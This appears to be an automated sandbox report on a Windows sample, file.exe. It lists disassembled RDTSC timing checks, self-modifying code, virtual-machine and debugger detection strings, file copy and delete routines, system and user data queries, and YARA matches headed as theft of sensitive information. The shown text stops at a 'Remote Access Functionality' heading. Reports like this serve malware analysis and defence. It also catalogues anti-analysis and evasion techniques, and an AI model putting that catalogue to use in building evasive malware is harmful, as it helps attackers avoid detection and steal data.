                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCCB7 second address: CFCCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F996107E1B6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F996107E1C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCCDD second address: CFCCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F99607DC0D8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC71D second address: CFC729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC8A2 second address: CFC8B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CBh 0x00000007 jnc 00007F99607DC0C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10701 second address: D10705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10705 second address: D1070B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D152F7 second address: D15314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15314 second address: D15358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0CFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99607DC0D4h 0x00000012 jmp 00007F99607DC0D9h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15358 second address: D15362 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F996107E1B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C8FC second address: D1C905 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C905 second address: D1C90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C775 second address: D1C78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007F99607DC0CAh 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1C78A second address: D1C78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1C78E second address: D1C798 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1C798 second address: D1C7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F996107E1B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D277DB second address: D2780A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F99607DC0C6h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 jns 00007F99607DC0C6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2780A second address: D27820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ebx 0x00000007 pushad 0x00000008 jmp 00007F996107E1BAh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27820 second address: D27829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27829 second address: D2782D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2782D second address: D27833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D26004 second address: D26015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1BCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D26015 second address: D26030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D4h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D266B6 second address: D266E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007F996107E1C2h 0x0000000e jmp 00007F996107E1BAh 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F996107E1B6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2685C second address: D26870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0CCh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D269D3 second address: D269D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D269D7 second address: D269E1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D269E1 second address: D269FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1C4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D269FB second address: D26A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F99607DC0C6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2A5FF second address: D2A603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2A603 second address: D2A607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2A607 second address: D2A628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F996107E1BDh 0x0000000b jc 00007F996107E1B8h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3EAA9 second address: C3EAB9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99607DC0C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3EAB9 second address: C3EABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2A353 second address: D2A357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D34618 second address: D3461E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D4A117 second address: D4A12D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99607DC0CEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D4A12D second address: D4A159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C8h 0x00000007 jo 00007F996107E1B8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D4A159 second address: D4A17B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99607DC0D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jo 00007F99607DC0C6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D59BB5 second address: D59BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D59BBC second address: D59BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 je 00007F99607DC0E0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D59BCE second address: D59BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D59BD2 second address: D59BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F99607DC0CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D59FFB second address: D5A001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A001 second address: D5A01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A2DC second address: D5A2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F996107E1B6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F996107E1C3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A47A second address: D5A480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A929 second address: D5A93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F996107E1B6h 0x0000000a jnc 00007F996107E1B6h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5EBF7 second address: D5EBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5EBFB second address: D5EBFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5F19B second address: D5F1A9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5F1A9 second address: D5F1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5F1AD second address: D5F1BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F99607DC0C8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5F1BF second address: D5F1D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F996107E1C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5F1D9 second address: D5F205 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F99607DC0D2h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jo 00007F99607DC0C6h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D60C7C second address: D60C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F996107E1B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D60C88 second address: D60CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D1h 0x00000009 popad 0x0000000a jo 00007F99607DC0CEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D60890 second address: D60894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D60894 second address: D6089A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D62788 second address: D6278C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D6278C second address: D62796 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99607DC0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C02E6 second address: 53C0303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ch, dh 0x0000000f mov dh, ch 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C0303 second address: 53C0309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C0309 second address: 53C030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C030D second address: 53C032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e call 00007F99607DC0CEh 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53C038B second address: 53C038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: AD1AFF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: AD1BCB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: AD1B31 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: C705AF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: ACF01E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: C98FE7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_008838B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00884910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00884910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0087DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0087E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0087ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00884570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00884570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087F68A FindFirstFileA, 0_2_0087F68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00883EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00883EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0087F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_008716D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0087DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0087BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00871160 GetSystemInfo,ExitProcess, 0_2_00871160
Source: file.exe, file.exe, 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware"U
Source: file.exe, 00000000.00000002.2117561798.0000000001602000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2117561798.0000000001632000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13402
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13399
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13413
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13417
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13453
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008745C0 VirtualProtect ?,00000004,00000100,00000000 0_2_008745C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00889860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00889860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00889750 mov eax, dword ptr fs:[00000030h] 0_2_00889750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008878E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_008878E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00889600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00889600
Source: file.exe, file.exe, 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00887B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00887980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00887980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00887850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00887850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00887A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00887A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

